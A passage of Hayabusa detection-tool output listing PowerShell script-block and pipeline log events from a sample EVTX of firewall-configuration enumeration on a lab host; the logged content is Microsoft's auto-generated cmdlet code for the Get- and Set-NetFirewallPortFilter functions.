$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallPortFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallPortFilter' function Set-NetFirewallPortFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallPortFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallPortFilter'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.911 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.911 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallPortFilter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.911 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallPortFilter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.911 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.911 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.911 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.911 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.911 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.911 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallPortFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Protocol}, [Parameter(ParameterSetName='ByQuery')] [Alias('DynamicTransport')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport[]] ${DynamicTarget}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Protocol') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Protocol}) $__cmdletization_queryBuilder.FilterByProperty('Protocol', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DynamicTarget') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DynamicTarget}) $__cmdletization_queryBuilder.FilterByProperty('DynamicTransport', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallPortFilter.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.911 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallPortFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, 